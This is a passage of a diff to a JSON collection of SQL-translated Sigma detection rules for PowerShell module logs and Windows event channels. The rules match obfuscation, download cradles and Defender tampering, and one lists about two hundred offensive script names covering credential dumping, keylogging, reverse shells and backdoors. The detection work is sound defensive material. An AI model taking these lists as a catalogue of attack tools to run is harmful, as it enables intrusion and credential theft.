'\\' OR ContextInfo LIKE '%FireListener.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ApplicationHost.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ChromeDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ClipboardContents.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ComputerDetail.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-FoxDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-GPPAutologon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-GPPPassword.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-IndexedItem.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Keystrokes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-LSASecret.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-MicrophoneAudio.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-PassHashes.ps1%' ESCAPE '\\' OR ContextInfo LIKE 
'%Get-PassHints.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RegAlwaysInstallElevated.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RegAutoLogon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RickAstley.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Screenshot.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-SecurityPackages.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServiceFilePermission.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServicePermission.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServiceUnquoted.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-SiteListPassword.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-System.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-TimedScreenshot.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-UnattendedInstallFile.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Unconstrained.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-USBKeystrokes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VaultCredential.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VulnAutoRun.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VulnSchTask.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WebConfig.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WebCredentials.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WLAN-Keys.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Gupt-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%HTTP-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%HTTP-Login.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Install-ServiceBinary.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Install-SSP.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ACLScanner.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ADSBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-AmsiBypass.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ARPScan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BackdoorLNK.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BadPotato.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BetterSafetyKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BruteForce.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BypassUAC.ps1%' 
ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Carbuncle.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Certify.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ConPtyShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-CredentialInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-CredentialsPhish.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DAFT.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DCSync.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Decode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DinvokeKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DllInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DowngradeAccount.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-EgressCheck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Encode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-EventViewer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Eyewitness.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-FakeLogonScreen.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Farmer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Get-RBCD-Threaded.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Gopher.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Grouper2.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Grouper3.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-HandleKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Interceptor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Internalmonologue.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Inveigh.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-InveighRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-JSRatRegsvr.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-JSRatRundll.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-KrbRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-KrbRelayUp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-LdapSignCheck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Lockless.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MalSCCM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Mimikatz.ps1%' ESCAPE '\\' OR 
ContextInfo LIKE '%Invoke-MimikatzWDigestDowngrade.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Mimikittenz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MITM6.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NanoDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NetRipper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NetworkRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NinjaCopy.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-OxidResolver.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-P0wnedshell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-P0wnedshellx86.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Paranoia.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PortScan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PoshRatHttp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PoshRatHttps.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PostExfil.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellIcmp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTCP.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTcpOneLine.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTcpOneLineBind.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellUdp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellUdpOneLine.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellWMI.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerThIEf.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PPLDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Prasadhak.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsExec.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsGcat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsGcatAgent.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PSInject.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsUaCme.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ReflectivePEInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ReverseDNSLookup.ps1%' ESCAPE '\\' OR ContextInfo LIKE 
'%Invoke-Rubeus.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-RunAs.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SafetyKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SauronEye.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SCShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Seatbelt.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ServiceAbuse.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SessionGopher.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ShellCode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SMBScanner.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Snaffler.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Spoolsample.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SSHCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SSIDExfil.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-StandIn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-StickyNotesExtract.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Tater.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Thunderfox.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ThunderStruck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-TokenManipulation.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Tokenvator.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-TotalExec.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-UrbanBishop.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-UserHunter.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-VoiceTroll.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Whisker.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WinEnum.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-winPEAS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WireTap.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WmiCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WScriptBypassUAC.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Zerologon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Keylogger.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%MailRaider.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%New-HoneyHash.ps1%' ESCAPE '\\' OR ContextInfo 
LIKE '%OfficeMemScraper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Offline\\_Winpwn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-CHM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-DnsTxt.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Excel.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-HTA.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Java.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-JS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Minidump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-RundllCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-SCF.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-SCT.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Shortcut.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-WebQuery.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Word.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Parse\\_Keys.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Port-Scan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerBreach.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%powercat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerRunAsSystem.psm1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerSharpPack.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerUp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerUpSQL.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerView.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PSAsyncShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%RemoteHashRetrieval.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-Persistence.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-PoshRat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-Update.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Run-EXEonRemote.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Schtasks-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-DCShadowPermissions.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-MacAttribute.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-RemotePSRemoting.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-RemoteWMI.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-Wallpaper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Show-TargetScreen.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Speak.ps1%' 
ESCAPE '\\' OR ContextInfo LIKE '%Start-CaptureServer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Start-WebcamRecorder.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%StringToBase64.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%TexttoExe.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%VolumeShadowCopyTools.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%WinPwn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%WSUSpendu.ps1%' ESCAPE '\\') OR (ContextInfo LIKE '%Invoke-Sharp%' ESCAPE '\\' AND ContextInfo LIKE '%.ps1%' ESCAPE '\\')))" ], - "filename": "win_mssql_sp_procoption_set.yml" + "filename": "posh_pm_exploit_scripts.yml" }, { - "title": "LPE InstallerFileTakeOver PoC CVE-2021-41379", - "id": "7dbb86de-a0cc-494c-8aa8-b2996c9ef3c8", + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module", + "id": "f3c89218-8c3d-4ba9-9974-f1d8e6a1b4a6", "status": "experimental", - "description": "Detects PoC tool used to exploit LPE vulnerability CVE-2021-41379", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.initial_access", - "attack.t1190" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Other MSI packages for which your admins have used that name" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1033' AND Provider_Name = 'MsiInstaller' AND Data LIKE '%test pkg%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*&&set.*(\\{\\d\\}){2,}\\\\\"\\s+?-f.*&&.*cmd.*/c')" ], - "filename": "win_vul_cve_2021_41379.yml" + "filename": "posh_pm_invoke_obfuscation_via_var.yml" }, { - "title": "Microsoft Malware Protection Engine Crash", - "id": "6c82cf5c-090d-4d57-9188-533577631108", + "title": "Zip A Folder With PowerShell For 
Staging In Temp - PowerShell Module", + "id": "daf7eb81-35fd-410d-9d7a-657837e602bb", "status": "experimental", - "description": "This rule detects a suspicious crash of the Microsoft Malware Protection Engine", - "author": "Florian Roth (Nextron Systems)", + "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1211", - "attack.t1562.001" + "attack.collection", + "attack.t1074.001" ], "falsepositives": [ - "MsMpEng.exe can crash when C:\\ is full" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND ((Provider_Name = 'Application Error' AND EventID = '1000') OR (Provider_Name = 'Windows Error Reporting' AND EventID = '1001')) AND (Data LIKE '%MsMpEng.exe%' ESCAPE '\\' AND Data LIKE '%mpengine.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%Compress-Archive %' ESCAPE '\\' AND ContextInfo LIKE '% -Path %' ESCAPE '\\' AND ContextInfo LIKE '% -DestinationPath %' ESCAPE '\\' AND ContextInfo LIKE '%$env:TEMP\\\\%' ESCAPE '\\')" ], - "filename": "win_susp_msmpeng_crash.yml" + "filename": "posh_pm_susp_zip_compress.yml" }, { - "title": "MSI Installation From Web", - "id": "5594e67a-7f92-4a04-b65d-1a42fd824a60", + "title": "Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell Module", + "id": "a23791fe-8846-485a-b16b-ca691e1b03d4", "status": "experimental", - "description": "Detects installation of a remote msi file from web.", - "author": "Stamatis Chatzimangou", + "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ + "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.t1218", - "attack.t1218.007" + "attack.t1059.001" ], 
"falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MsiInstaller' AND EventID IN ('1040', '1042') AND Data LIKE '%://%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%rundll32.exe%' ESCAPE '\\' AND Payload LIKE '%shell32.dll%' ESCAPE '\\' AND Payload LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND Payload LIKE '%powershell%' ESCAPE '\\')" ], - "filename": "win_msi_install_from_web.yml" + "filename": "posh_pm_invoke_obfuscation_via_rundll.yml" }, { - "title": "Atera Agent Installation", - "id": "87261fb2-69d0-42fe-b9de-88c6b5f65a43", + "title": "Suspicious Get Local Groups Information", + "id": "cef24b90-dddc-4ae1-a09a-8764872f69fc", "status": "test", - "description": "Detects successful installation of Atera Remote Monitoring & Management (RMM) agent as recently found to be used by Conti operators", - "author": "Bhabesh Raj", + "description": "Adversaries may attempt to find local system groups and permission settings.\nThe knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.\n", + "author": "frack113", "tags": [ - "attack.t1219" + "attack.discovery", + "attack.t1069.001" ], "falsepositives": [ - "Legitimate Atera agent installation" + "Administrator script" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1033' AND Provider_Name = 'MsiInstaller' AND Message LIKE '%AteraAgent%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((Payload LIKE '%get-localgroup%' 
ESCAPE '\\' OR Payload LIKE '%Get-LocalGroupMember%' ESCAPE '\\') OR (ContextInfo LIKE '%get-localgroup%' ESCAPE '\\' OR ContextInfo LIKE '%Get-LocalGroupMember%' ESCAPE '\\') OR (Payload LIKE '%Get-WMIObject%' ESCAPE '\\' AND Payload LIKE '%Win32\\_Group%' ESCAPE '\\') OR (ContextInfo LIKE '%Get-WMIObject%' ESCAPE '\\' AND ContextInfo LIKE '%Win32\\_Group%' ESCAPE '\\')))" ], - "filename": "win_software_atera_rmm_agent_install.yml" + "filename": "posh_pm_susp_local_group_reco.yml" }, { - "title": "Restricted Software Access By SRP", - "id": "b4c8da4a-1c12-46b0-8a2b-0a8521d03442", + "title": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand - PowerShell Module", + "id": "38a7625e-b2cb-485d-b83d-aff137d859f4", "status": "experimental", - "description": "Detects restricted access to applications by the Software Restriction Policies (SRP) policy", + "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1072" + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Microsoft-Windows-SoftwareRestrictionPolicies' AND EventID IN ('865', '866', '867', '868', '882'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%Invoke-ATHRemoteFXvGPUDisablementCommand %' ESCAPE '\\' AND (ContextInfo LIKE '%-ModuleName %' ESCAPE '\\' OR ContextInfo LIKE '%-ModulePath %' ESCAPE '\\' OR ContextInfo LIKE '%-ScriptBlock %' ESCAPE '\\' OR ContextInfo LIKE '%-RemoteFXvGPUDisablementFilePath%' ESCAPE '\\'))" ], - "filename": "win_software_restriction_policies_block.yml" + "filename": "posh_pm_susp_athremotefxvgpudisablementcommand.yml" }, { - "title": "Audit CVE Event", - "id": 
"48d91a3a-2363-43ba-a456-ca71ac3da5c2", + "title": "Invoke-Obfuscation VAR+ Launcher - PowerShell Module", + "id": "6bfb8fa7-b2e7-4f6c-8d9d-824e5d06ea9e", "status": "experimental", - "description": "Detects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited.\nMS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability.\nUnfortunately, that is about the only instance of CVEs being written to this log.\n", - "author": "Florian Roth (Nextron Systems), Zach Mathis", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.execution", - "attack.t1203", - "attack.privilege_escalation", - "attack.t1068", "attack.defense_evasion", - "attack.t1211", - "attack.credential_access", - "attack.t1212", - "attack.lateral_movement", - "attack.t1210", - "attack.impact", - "attack.t1499.004" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name IN ('Microsoft-Windows-Audit-CVE', 'Audit-CVE') AND EventID = '1')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r)(?:\\s|)\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\"\\s+?-f(?:.*\\)){1,}.*\"')" ], - "filename": "win_audit_cve.yml" + "filename": "posh_pm_invoke_obfuscation_var.yml" }, { - "title": "Potential Credential Dumping Via WER - Application", - "id": "a18e0862-127b-43ca-be12-1a542c75c7c5", + "title": "Invoke-Obfuscation Via Use Clip - PowerShell Module", + "id": "ebdf49d8-b89c-46c9-8fdf-2c308406f6bd", "status": "experimental", - "description": "Detects windows error reporting event where the process that crashed is lsass. 
This could be the cause of an intentional crash by techniques such as Lsass-Shtinkering to dump credential", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Rare legitimate crashing of the lsass process" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Application Error' AND EventID = '1000' AND AppName = 'lsass.exe' AND ExceptionCode = 'c0000001')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*')" ], - "filename": "win_werfault_susp_lsass_credential_dump.yml" + "filename": "posh_pm_invoke_obfuscation_via_use_clip.yml" }, { - "title": "Windows Defender Suspicious Configuration Changes", - "id": "801bd44f-ceed-4eb6-887c-11544633c0aa", - "status": "stable", - "description": "Detects suspicious changes to the windows defender configuration", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Invoke-Obfuscation Via Stdin - PowerShell Module", + "id": "c72aca44-8d52-45ad-8f81-f96c4d3c755e", + "status": "experimental", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Administrator activity (must be investigated)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5007' AND (NewValue LIKE '%\\\\Windows 
Defender\\\\DisableAntiSpyware %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableRemovableDriveScanning %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableScanningMappedNetworkDrivesForFullScan %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\SpyNet\\\\DisableBlockAtFirstSeen %' ESCAPE '\\' OR NewValue LIKE '%\\\\Real-Time Protection\\\\SpyNetReporting %' ESCAPE '\\' OR NewValue LIKE '%\\\\Real-Time Protection\\\\SubmitSamplesConsent %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*(set).*&&\\s?set.*(environment|invoke|\\$?\\{?input).*&&.*\"')" ], - "filename": "win_defender_suspicious_features_tampering.yml" + "filename": "posh_pm_invoke_obfuscation_via_stdin.yml" }, { - "title": "Win Defender Restored Quarantine File", - "id": "bc92ca75-cd42-4d61-9a37-9d5aa259c88b", + "title": "Suspicious PowerShell Download - PoshModule", + "id": "de41232e-12e8-49fa-86bc-c05c7e722df9", "status": "experimental", - "description": "Detects the restoration of files from the defender quarantine", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious PowerShell download command", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate administrator activity restoring a file" + "PowerShell scripts that download content from the Internet" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1009')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%System.Net.WebClient%' ESCAPE '\\' AND (ContextInfo LIKE '%.DownloadFile(%' ESCAPE 
'\\' OR ContextInfo LIKE '%.DownloadString(%' ESCAPE '\\'))" ], - "filename": "win_defender_restored_quarantine_file.yml" + "filename": "posh_pm_susp_download.yml" }, { - "title": "Windows Defender Malware Detection History Deletion", - "id": "2afe6582-e149-11ea-87d0-0242ac130003", + "title": "Alternate PowerShell Hosts - PowerShell Module", + "id": "64e8e417-c19a-475a-8d19-98ea705394cc", "status": "test", - "description": "Windows Defender logs when the history of detected infections is deleted. Log file will contain the message \"Windows Defender Antivirus has removed history of malware and other potentially unwanted software\".", - "author": "Cian Heasley", + "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Deletion of Defender malware detections history for legitimate reasons" + "Programs using PowerShell directly without invocation of a dedicated interpreter", + "MSP Detection Searcher", + "Citrix 